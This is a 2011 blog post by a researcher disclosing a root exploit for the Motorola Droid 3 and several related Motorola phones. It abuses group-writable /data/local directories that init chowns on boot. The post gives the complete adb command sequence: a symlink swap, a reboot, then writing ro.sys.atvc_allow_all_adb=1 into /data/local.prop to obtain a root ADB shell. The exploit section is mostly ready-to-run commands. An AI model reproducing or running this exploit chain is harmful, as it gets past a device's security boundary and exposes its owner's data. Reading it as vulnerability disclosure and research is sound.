The Motorola Droid 3 was released July 14, 2011, and has no public technique available to get root access. On request of some members of the Android community, I decided to audit the platform in order to root the device.
Update: this exploit is also confirmed to work on the Droid X, Droid X2, Droid Cliq, Droid Cliq 2, Droid 2, and Droid Bionic.
I identified a vulnerability specific to Motorola devices in the script parsed by the init thread (this is existing code, not commands for you to run):
mkdir /data/local 0771 mot_tcmd shell
mkdir /data/local/tmp 0771 mot_tcmd shell
mkdir /data/local/12m 0771 mot_tcmd shell
mkdir /data/local/12m/batch 0771 mot_tcmd shell
chown mot_tcmd shell /data/local
chown mot_tcmd shell /data/local/12m
chown mot_tcmd shell /data/local/12m/batch
chown mot_tcmd shell /data/local/tmp
Since the contents of /data/local are group “shell” and group-writable, we can modify the contents of this directory using ADB. By logging into the device and replacing one of the sub-directories listed here with a symbolic link, then when the device reboots it will change the ownership of the symlink target to group “shell”. This can be used to edit property files to manipulate the behavior of ADB to achieve root.
So, without further ado:
Log in to the device using “adb shell” and type the following commands:
mv /data/local/12m /data/local/12m.bak ln -s /data /data/local/12m
Next, physically reboot the device by pressing the power button. When it wakes up, log in using “adb shell” again, and type the following:
rm /data/local/12m mv /data/local/12m.bak /data/local/12m mv /data/local.prop /data/local.prop.bak echo "ro.sys.atvc_allow_netmon_usb=0" > /data/local.prop echo "ro.sys.atvc_allow_netmon_ih=0" >> /data/local.prop echo "ro.sys.atvc_allow_res_core=0" >> /data/local.prop echo "ro.sys.atvc_allow_res_panic=0" >> /data/local.prop echo "ro.sys.atvc_allow_all_adb=1" >> /data/local.prop echo "ro.sys.atvc_allow_all_core=0" >> /data/local.prop echo "ro.sys.atvc_allow_efem=0" >> /data/local.prop echo "ro.sys.atvc_allow_bp_log=0" >> /data/local.prop echo "ro.sys.atvc_allow_ap_mot_log=0" >> /data/local.prop echo "ro.sys.atvc_allow_gki_log=0" >> /data/local.prop
The ro.sys.atvc_allow_all_adb property is a Motorola-specific configuration that prevents ADB from dropping its root privileges. Reboot the device one final time, and on logging in with “adb shell”, you should be presented with a root prompt. Enjoy!
Thanks to mkultramega, Toaday, and zdooder for testing, KrazyKrivda for raising funds, scottml and Edgan for bouncing ideas, and rweb for convincing me to look at Droid 3 in the first place.
This entry was posted on Thursday, August 25th, 2011 at 3:56 pm and is filed under Exploitation, Linux. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.